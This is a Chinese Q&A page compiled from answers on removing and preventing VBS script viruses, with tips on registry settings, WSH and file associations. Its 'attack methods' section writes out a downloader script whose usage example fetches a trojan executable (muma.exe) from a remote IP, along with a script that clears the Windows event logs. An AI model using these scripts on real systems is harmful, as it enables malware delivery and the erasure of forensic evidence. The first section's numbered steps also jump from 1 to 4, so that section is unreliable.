vbs脚本病毒专杀

㈠ 电脑中了vbs病毒怎么解决

1、打开计算机的安全卫士，在页面上方的菜单栏中可见“木马查杀”。

4、清除之后电脑就可以正常使用了。

㈡ VBS文件是病毒的文件吗怎么杀呢

VBS文件是脚本文件,也是一种可执行程序,不一定是病毒.
如果不放心,安装一款专业杀毒软件查杀即可.比如:金山毒霸2011

㈢ vbs病毒怎么查杀

您好

1，VBS脚本病毒是使用VBScript编写，以宏病毒和新欢乐时光病毒为典型代表的病毒。

2，其实VBS病毒很容易查杀，主要是此类病毒欺骗性强，一般杀毒软件容易漏杀。

3，您可以到腾讯电脑管家官网下载一个电脑管家。

4，然后使用电脑管家——杀毒——全盘查杀即可，电脑管家拥有2大云杀毒引擎，可以根据云鉴定和微特征检测出电脑中隐藏的木马病毒进行查杀。

如果还有其他疑问和问题，欢迎再次来电脑管家企业平台进行提问，我们将尽全力为您解答疑难

㈣ 中了vbs病毒请求帮助！！

vbs脚本病毒是个很N的类型，杀毒软件对其只有查杀却没修复。要彻底修复，你得对VBS脚本解密（有些），但解密后，如果你看不懂那些命令，像那些注册表的更改，在你没备份的情况下是很难全改过来的，还有这些病毒通常还会在system创建svchost.exe脚本宿主(文件名不一定，你也别见svchost.exe就删）。还有如果它修改了文件关联，在已经删除病毒的情况下，运行cmd
使用ftype命令来恢复bat的关联，使用批处理来恢复其余文件。

㈤ VBS脚本病毒的简介

网络的流行，让我们的世界变得更加美好，但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件，用兴奋得几乎快发抖的鼠标去点击附件的时候；当您浏览一个信任的网站之后，发现打开每个文件夹的速度非常慢的时候，您是否察觉病毒已经闯进了您的世界呢？2000年5月4日欧美爆发的“宏病毒”网络蠕虫病毒。由于通过电子邮件系统传播，宏病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪，全球经济损失达几十亿美元。而2002上半年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。
上面提及的两个病毒最大的一个共同特点是：使用VBScript编写。下面我们就来逐一对VBS脚本病毒的各个方面加以分析：

㈥ VBS脚本病毒的攻击方法

.文件下载(无回显)
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe 用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe
2.列举进程
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs 用法:cscript ps.vbs
3.终止进程
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs 用法:cscript pskill.vbs pid
4.重启系统
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs 用法:cscript reboot.vbs5.利用脚本编程删除日志strComputer= "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles=objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中，首先获得object对象，然后利用其clearEventLog()方法删除日志。建立一个数组，application,security,system，如果还有其他日志也可以加入数组。然后用一个for循环，删除数组中的每一个元素，即各个日志。

㈦ 怎么才能根除U盘“.vbs”病毒

VBS病毒是用VB
Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：
编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强；可以通过通过Email附件传播；通过局域网共享传播；通过感染htm、asp、jsp、php等网页文件传播；通过IRC聊天通道传播；
如何预防和解除vbs脚本病毒
针对以上提到的VBS脚本病毒的弱点，笔者提出如下集中防范措施：
1）禁用文件系统对象FileSystemObject
方法：用regsvr32
scrrun.dll
/u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。
还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{0D43FE01-F093-11CF-8940-00A0C9054228}的项，咔嚓即可。
2）卸载Windows
Scripting
Host
在Windows
98中（NT
4.0以上同理），打开［控制面板］→［添加/删除程序］→［Windows安装程序］→［附件］，取消“Windows
Scripting
Host”一项。
和上面的方法一样，在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的项，咔嚓。
3）删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射
点击［我的电脑］→［查看］→［文件夹选项］→［文件类型］，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。
4）在Windows目录中，找到WScript.exe，更改名称或者删除，如果你觉得以后有机会用到的话，最好更改名称好了，当然以后也可以重新装上。
5）要彻底防治VBS网络蠕虫病毒，还需设置一下你的浏览器。我们首先打开浏览器，单击菜单栏里“Internet
选项”安全选项卡里的［自定义级别］按钮。把“ActiveX控件及插件”的一切设为禁用，这样就不怕了。呵呵，譬如新欢乐时光的那个ActiveX组件如果不能运行，网络传播这项功能就玩完了。
6）禁止OE的自动收发邮件功能
7）由于蠕虫病毒大多利用文件扩展名作文章，所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”，将其修改为显示所有文件类型的扩展名称。
8）将系统的网络连接的安全级别设置至少为“中等”，它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。
9）最后就是使用杀毒软件。
10）可以使用这些工具进行查杀：
http://www.tmxy.net/qt/auto.htm

㈧ 支招杀.vbs病毒

worm.vbs病毒行为：
1、病毒运行后衍生的病毒文件：
%system32%\systeminit.exe
%system32%\winsystem.exe
%system32%\wininit.exe
X:\kerneldrive.exe
X:\autorun.inf
（其中X表示相应的盘符，不过移动盘根目录下的病毒文件为handydriver.exe与autorun.inf）
worm.vbs病毒清除方案：
1、从正常电脑上拷贝任务管理器taskmgr.exe与cmd.exe文件到中毒电脑上。
2、结束病毒进程wininit.exe：
直接运行cmd.exe输入命令tasklist查看进程列表，输入taskkill
/pid
xxx结束病毒进程。（xxx表示病毒进程对应的pid号）
3、运行"gpedit.msc"打开组策略：
恢复“文件夹选项”，按步骤执行：
用户配置-管理模板-Windows组件-WIindows资源管理器-从“工具”菜单删除“文件夹选项”菜单-已禁用-确定。
恢复“任务管理器”，按步骤执行：
用户配置-管理模板-系统-Ctrl+Alt+Del选项-删除“任务管理器”-已禁用-确定。
4、用正常的taskgmr.exe与cmd.exe文件覆盖%system32%下被病毒替换的taskmgr.exe与cmd.exe文件。
5、显示隐藏的病毒文件，按步骤执行：
我的电脑-菜单栏-工具-文件夹选项-查看-勾去“隐藏受保护的操作系统文件（推荐）”-勾选“显示所有文件和文件夹”-确定。
6、删除病毒文件：
%system32%\systeminit.exe
%system32%\winsystem.exe
%system32%\wininit.exe
X:\kerneldrive.exe
X:\autorun.inf
（注意：删除病毒文件时，千万不要双击打开盘符以免激活病毒，可以通过地址栏或资源管理器进入相应盘符。）
7、分别以关键字systeminit.exe,winsystem.exe,wininit.exe,kerneldrive.exe,handydriver.exe搜索注册表，删除相应键值。最后建议用魔法兔子进行垃圾清理